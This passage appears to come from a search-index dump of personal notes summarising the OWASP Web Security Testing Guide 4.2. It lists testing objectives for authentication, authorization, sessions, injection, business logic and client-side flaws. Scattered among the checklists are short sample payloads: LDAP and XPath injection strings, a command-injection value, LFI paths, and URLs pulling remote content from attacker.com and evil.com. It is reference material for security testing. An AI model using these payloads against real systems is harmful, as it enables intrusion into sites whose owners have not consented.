Provisioning Process - Verify which accounts may provision other accounts and of what type. 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis. 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#4-authentication-testing","title":"4. Authentication Testing","text":"4. Authentication Testing ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords. 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking. 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and do not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off? 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: nocache) 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords. 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities. 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?) - Test password change (Need old password?) 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exists on the alternative channels. 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#5-authorization-testing","title":"5. Authorization Testing","text":"5. Authorization Testing ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser) 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures. 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456) 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#6-session-management-testing","title":"6. Session Management Testing","text":"6. Session Management Testing ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated. 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict) 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renew the cookie after a successfully user authentication. 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?) 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token. 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout. 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable. 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level. 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#7-data-validation-testing","title":"7. Data Validation Testing","text":"7. Data Validation Testing ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP. 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection: 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities. 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection. 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts. 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity. 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:| 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application. 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible. 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable. 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes of end user Browser proxy or client-side application. 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header. 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability. 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#8-error-handling","title":"8. Error Handling","text":"8. Error Handling ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: Random files/folders (40x) - Analyze the different output returned. 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#9-cryptography","title":"9. Cryptography","text":"9. Cryptography ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE) - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application. 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis. 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data) 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#10-business-logic-testing","title":"10. Business logic Testing","text":"10. Business logic Testing ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it. 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow. 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow. 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing (Race Condition). 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times. 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified. 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures. 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed. 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#11-client-side-testing","title":"11. Client Side Testing","text":"11. Client Side Testing ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points. 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user= 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection. 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless. 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable. 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels. 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input. 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries. 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques. 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#12-api-testing","title":"12. API Testing","text":"12. API Testing ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/WSTG-APIT-01/","title":"Testing GraphQL","text":"

        OWASP Web Security Testing Guide 4.2 > 12. API Testing > 12.1. Testing GraphQL

        ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["web pentesting","WSTG-APIT-01"]},{"location":"OWASP/WSTG-ATHN-01/","title":"Testing for Credentials Transported over an Encrypted Channel","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.1. Testing for Credentials Transported over an Encrypted Channel

        ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03","tags":["web pentesting","WSTG-ATHN-01"]},{"location":"OWASP/WSTG-ATHN-02/","title":"Testing for Default Credentials","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.2. Testing for Default Credentials

        ID Link to Hackinglife Link to OWASP Description 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords.","tags":["web pentesting","WSTG-ATHN-02"]},{"location":"OWASP/WSTG-ATHN-03/","title":"Testing for Weak Lock Out Mechanism","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.3. Testing for Weak Lock Out Mechanism

        ID Link to Hackinglife Link to OWASP Description 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking.","tags":["web pentesting","WSTG-ATHN-03"]},{"location":"OWASP/WSTG-ATHN-04/","title":"Testing for Bypassing Authentication Schema","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.4. Testing for Bypassing Authentication Schema

        ID Link to Hackinglife Link to OWASP Description 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection","tags":["web pentesting","WSTG-ATHN-04"]},{"location":"OWASP/WSTG-ATHN-05/","title":"Testing for Vulnerable Remember Password","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.5. Testing for Vulnerable Remember Password

        ID Link to Hackinglife Link to OWASP Description 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and do not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?","tags":["web pentesting","WSTG-ATHN-05"]},{"location":"OWASP/WSTG-ATHN-06/","title":"Testing for Browser Cache Weaknesses","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.6. Testing for Browser Cache Weaknesses

        ID Link to Hackinglife Link to OWASP Description 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: nocache)","tags":["web pentesting","WSTG-ATHN-06"]},{"location":"OWASP/WSTG-ATHN-07/","title":"Testing for Weak Password Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.7. Testing for Weak Password Policy

        ID Link to Hackinglife Link to OWASP Description 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords.","tags":["web pentesting","WSTG-ATHN-07"]},{"location":"OWASP/WSTG-ATHN-08/","title":"Testing for Weak Security Question Answer","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.8. Testing for Weak Security Question Answer

        ID Link to Hackinglife Link to OWASP Description 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities.","tags":["web pentesting","WSTG-ATHN-08"]},{"location":"OWASP/WSTG-ATHN-09/","title":"Testing for Weak Password Change or Reset Functionalities","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.9. Testing for Weak Password Change or Reset Functionalities

        ID Link to Hackinglife Link to OWASP Description 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?) - Test password change (Need old password?)","tags":["web pentesting","WSTG-ATHN-09"]},{"location":"OWASP/WSTG-ATHN-10/","title":"Testing for Weaker Authentication in Alternative Channel","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.10. Testing for Weaker Authentication in Alternative Channel

        ID Link to Hackinglife Link to OWASP Description 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exists on the alternative channels.","tags":["web pentesting","WSTG-ATHN-10"]},{"location":"OWASP/WSTG-ATHN-11/","title":"Testing Multi-Factor Authentication (MFA)","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.11. Testing Multi-Factor Authentication (MFA)

        ID Link to Hackinglife Link to OWASP Description 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["web pentesting","WSTG-ATHN-11"]},{"location":"OWASP/WSTG-ATHZ-01/","title":"Testing Directory Traversal File Include","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-01/#see-my-notes","title":"See my notes","text":"

        See my notes on Local File Inclusion

        See my notes on Remote File Inclusion

        ","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-02/","title":"Testing for Bypassing Authorization Schema","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

        ID Link to Hackinglife Link to OWASP Description 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser)","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-02/#see-my-notes","title":"See my notes","text":"
        • Broken access control: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
        ","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-03/","title":"Testing for Privilege Escalation","text":"

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.3. Testing for Privilege Escalation

        ID Link to Hackinglife Link to OWASP Description 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures.","tags":["web pentesting","WSTG-ATHZ-03"]},{"location":"OWASP/WSTG-ATHZ-04/","title":"Testing for Insecure Direct Object References","text":"

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.4. Testing for Insecure Direct Object References

        ID Link to Hackinglife Link to OWASP Description 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456)","tags":["web pentesting","WSTG-ATHZ-04"]},{"location":"OWASP/WSTG-ATHZ-05/","title":"Testing for OAuth Weaknesses","text":"

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.5. Testing for OAuth Weaknesses

        ID Link to Hackinglife Link to OWASP Description 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["web pentesting","WSTG-ATHZ-05"]},{"location":"OWASP/WSTG-BUSL-01/","title":"Test Business Logic Data Validation","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.1. Test Business Logic Data Validation

        ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it.","tags":["web pentesting","WSTG-BUSL-01"]},{"location":"OWASP/WSTG-BUSL-02/","title":"Test Ability to Forge Requests","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.2. Test Ability to Forge Requests

        ID Link to Hackinglife Link to OWASP Description 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow.","tags":["web pentesting","WSTG-BUSL-02"]},{"location":"OWASP/WSTG-BUSL-03/","title":"Test Integrity Checks","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.3. Test Integrity Checks

        ID Link to Hackinglife Link to OWASP Description 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.","tags":["web pentesting","WSTG-BUSL-03"]},{"location":"OWASP/WSTG-BUSL-04/","title":"Test for Process Timing","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.4. Test for Process Timing

        ID Link to Hackinglife Link to OWASP Description 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing (Race Condition).","tags":["web pentesting","WSTG-BUSL-04"]},{"location":"OWASP/WSTG-BUSL-05/","title":"Test Number of Times a Function Can Be Used Limits","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.5. Test Number of Times a Function Can Be Used Limits

        ID Link to Hackinglife Link to OWASP Description 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.","tags":["web pentesting","WSTG-BUSL-05"]},{"location":"OWASP/WSTG-BUSL-06/","title":"Testing for the Circumvention of Work Flows","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.6. Testing for the Circumvention of Work Flows

        ID Link to Hackinglife Link to OWASP Description 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified.","tags":["web pentesting","WSTG-BUSL-06"]},{"location":"OWASP/WSTG-BUSL-07/","title":"Test Defenses Against Application Misuse","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.7. Test Defenses Against Application Misuse

        ID Link to Hackinglife Link to OWASP Description 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account","tags":["web pentesting","WSTG-BUSL-07"]},{"location":"OWASP/WSTG-BUSL-08/","title":"Test Upload of Unexpected File Types","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

        ID Link to Hackinglife Link to OWASP Description 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures.","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-08/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

        See my notes on Arbitrary File Upload

        ","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-09/","title":"Test Upload of Malicious Files","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.9. Test Upload of Malicious Files

        ID Link to Hackinglife Link to OWASP Description 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed.","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-09/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

        See my notes on Arbitrary File Upload

        ","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-10/","title":"Test Payment Functionality","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.10. Test Payment Functionality

        ID Link to Hackinglife Link to OWASP Description 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["web pentesting","WSTG-BUSL-10"]},{"location":"OWASP/WSTG-CLNT-01/","title":"Testing for DOM-Based Cross Site Scripting","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.1. Testing for DOM-Based Cross Site Scripting

